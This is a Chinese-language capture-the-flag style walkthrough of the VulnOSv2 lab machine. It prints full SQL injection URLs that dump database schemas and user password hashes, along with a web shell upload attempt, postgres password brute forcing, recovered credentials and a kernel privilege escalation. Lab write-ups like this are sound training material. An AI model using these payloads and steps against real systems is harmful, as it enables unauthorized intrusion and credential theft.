【oscp】Blender软件的信息泄露—VulnOSv2
端口扫描
80探测
访问前端页面
全端口扫描,有一个6667端口(一款多平台上可使用的IRC守护程序)
wappalyzer信息收集
使用dirb进行目录扫描
都没有结果了,点击页面上的那个website,会跳转到这个页面
这里要看仔细一点,这里字体是黑色的,有一个页面路径/jabcd0cs,和用户密码guest/guest
去访问这个目录前可以直接使用这个用户登录一下ssh,很明显登录失败
访问并登录
登录成功
这里有一个文件上传(add document)
尝试上传shell.php(一句话木马),但是我们并不知道上传的目录在哪
再次目录扫描,这次扫描需要加上这个隐藏的路径jabcd0cs
这些方法都可以试试,还有一个执行文件的东西,找绝对路径,找到一句话木马的位置
可惜都不行
这时候就需要细心一点了
searchsploit漏洞检索,找到一个漏洞
有一个sql注入开始利用
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9
暴库
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata
# information_schema,drupal7,jabcd0cs,mysql,performance_schema,phpmyadmin暴表(jabcd0cs表)
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables
where table_schema=database()
# odm_access_log,odm_admin,odm_category,odm_data,odm_department,odm_dept_perms,odm_dept_reviewer,odm_filetypes,odm_log,odm_odmsys,odm_rights,odm_settings,odm_udf,odm_user,odm_user_perms暴字段(jabcd0cs表),但是没有任何关于密码的字段
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns
where table_schema=database()
# file_id,user_id,timestamp,action,id,admin,id,name,id,category,owner,realname,created,description,comment,status,department,default_rights,publishable,reviewer,reviewer_comments,id,name,fid,dept_id,rights,dept_id,user_id,id,type,active,id,modified_on,modified_by,note,revision,id,sys_name,sys_value,RightId,Description,id,name,value,descripti这里有一个注意点,就是用字符串表名来查表的时候查不出来,payload如下:
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns
where table_schema=database() and table_name=odm_user
这里要把表的字符串换成16进制,6f646d5f75736572
所以完整暴字段(带表)的payload是
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns
where table_schema=database() and table_name=0x6f646d5f75736572
# id,username,password,department,phone,Email,last_name,first_name,pw_reset_code
查密码
http://192.168.111.194/jabcd0cs/ajax_udf.php
?q=1
&add_value=odm_user%20UNION%20SELECT%201,
group_concat(username,password),3,4,5,6,7,8,9 from odm_user
# webmin
# b78aae356709f8c31118ea613980954b # webmin1980
# guest
# 084e0343a0486ff05530df6c705c8bb4 # guest知道了账号密码,第一时间测试ssh连接,连接成功了
内核信息收集
内核漏洞检索(没有漏洞)
历史命令,看到用户vulnosadmin的目录下面的文件,有很多hydra的文件
运行一下
使用make命令(Makefile 是一个文本文件,其中定义了如何构建程序所需的规则和步骤。)
再查看进程信息,ps -aux,包含了postgres数据库
![图片[31]-Blender软件的信息泄露—VulnOSv2-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/202501040212212.png)
将/usr/share/wordlists/metasploit/postgres_default_pass.txt和postgres_default_user.txt文件传到靶机上,进行
密码爆破。爆破出 postgres/postgres
登录postgres数据库
psql -h localhost -U postgres
l,注意,postgres数据库查询语句区分大小写
vulnosadmin / c4nuh4ckm3tw1c3
将此文件复制到网页根目录下面
本机下载,打开这个网站,并上传上去,点击旁边的那个框,就可以看到密码了
https://imagetostl.com/cn/view-blend-online
Tips:.blend 文件是 Blender 软件的专有文件格式,用于保存 3D 制作项目。
第二种方法,内核提权,信息收集
低版本的内核提权
传到靶机上,编译,并运行,提权成功
注意点
在使用sql注入的时候如果不能正常的根据表名查找数据,那么可以将其转换为十六进制,例如
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns
where table_schema=database() and table_name=0x6f646d5f75736572 # odm_userpostgres数据库的登录命令
psql -h localhost -U postgrespostgres数据库的查询语句,是区分大小写的
l :显示数据库
c:切换连接的数据库
往期推荐
【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了
【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
暂无评论内容